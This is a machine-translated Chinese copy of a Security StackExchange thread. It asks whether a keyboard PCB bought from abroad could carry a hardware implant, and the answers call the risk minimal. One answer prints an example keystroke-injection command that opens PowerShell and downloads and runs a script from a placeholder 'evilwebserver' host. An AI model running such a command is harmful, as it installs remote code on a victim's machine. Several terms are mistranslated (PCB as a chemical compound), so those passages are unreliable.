我正在考虑从国外的人那里购买一个键盘PCB,但我不能百分之百确定它是否安全。
我将要安装的固件是QMK,它是开源的,我觉得使用它是安全的。
然而,PCB本身使我有点偏执..。
发布于 2019-07-19 20:19:31
有可能是的。但不太可能。
除非你有动机相信有人会把很多钱花在专门感染你的手术上,否则你不需要担心。不仅一个定制的硬件植入是昂贵的创建,但你也会闪现一个定制固件。软件植入更便宜更容易。
如果你是一个为政府、大公司、新闻或人权组织工作的特殊目标,请向你的技术支持团队询问方向。如果你不是,你就是太偏执了。即使您是目标列表的一部分,使用软件感染您的系统也是非常容易、快捷、可靠和容易否认的。隐藏硬件植入比在您的计算机上运行软件植入要困难得多,该软件只在内存中运行,如果发现就会强制重新启动,并且没有留下任何痕迹。
如果你疑神疑鬼,不相信你正在购买的键盘,考虑自己建造它,用你自己买的现成的键盘。在我看来这太过分了,但会让你觉得更安全。
发布于 2019-07-19 21:50:45
假设你是说你购买的是一个真正的裸PCB,而不是预先填充的PCB,那么它几乎不可能包含一个无法检测到的隐藏芯片。键盘几乎普遍是由双面多氯联苯制造的,而且大多数键盘都有广泛的开放式跟踪运行,以节省重量和铜。它们通常是半透明的,以至于没有地面平面来隐藏芯片免受简单的眼球扫描,而且层与层之间通常没有足够的空间嵌入隐藏芯片(嵌入的组件被嵌入到从多平面板中间层雕刻而成的口袋中,但我从未听说过用双面板来完成这一工作)。
一个隐藏在键盘上的芯片需要的是一种与外界交流的方式。没有办法确保键盘将被使用在一个带有公共Wi的位置,因此RF已经失效;恶意行为者唯一可以依赖的就是与主机的USB连接。恶意键盘,如巴什兔子或橡胶达克,工作说服主机执行命令代表他们,但这样做不留下痕迹是相当困难的。
恶意芯片必须等待系统启动和用户登录。一旦准备好,它就会键入类似<Windows>+R powershell.exe<enter>IEX (New-Object Net.WebClient).DownloadString('https://evilwebserver/payload.ps1');exit;<enter>"的内容来安装一些恶意软件。所有这些基于键盘的方法都会在屏幕上临时闪烁窗口,并在事件或浏览器日志中留下证据。它们对于主机操作系统也非常特殊;在mac或linux上运行它们只会产生lulz。
此外,与一旦部署就可以删除的软件不同,这些设备永远都是它们存在的证据。一个成熟到能够部署这样的设备的对手不会冒着被抓的危险,把它们发送到互联网上每个购买光板的农场。他们只会冒险把被这些芯片感染的董事会派到价值最高的目标,比如银行高管、首席执行官、政府或军事目标等。他们知道,一旦被不满的政府机构发现,行凶者就会被追捕。当他们被新闻记者、博主或安全研究人员揭穿时,卖家将被赶出市场,并可能被关进监狱。
风险已经接近于零,你应该可以轻松地订购。
发布于 2019-07-19 20:05:33
这是可能的,而据报道曾发生过,但报告 曾经是 证明 错误。彭博社( Bloomberg )的文章称,一家供应商在AWS服务器主板上增加了一个额外的芯片,这与设计相反,是为了提取敏感数据。
许多人认为这个故事是可信的,所以认为任何PCB都可能被恶意制造并不是一件牵强的事。然而,这是完全不切实际的,尤其是针对普通消费者的攻击。
这种攻击将是非常复杂的,并将取决于能否隐藏对大规模生产的多氯联苯的微小变化。一次性印刷一个定制的PCB将是一个非常昂贵的攻击,低回报和高风险被发现。任何有能力进行这种攻击的人也将对他们的所有攻击进行风险评估。除非你知道你是国家监视的目标,否则这种攻击是不值得担心的。
由于这样的攻击会留下确凿的证据,所以不可能像软件那样无限期地隐藏或删除。尝试这样的攻击会暴露出你已经入侵了哪一家制造商(S),如果你将来迫切需要使用它们,那么它们对你的用处就会耗尽。毕竟,一家不能出售其受损产品的工厂将无法再传播这种妥协。
https://security.stackexchange.com/questions/213810
复制相似问题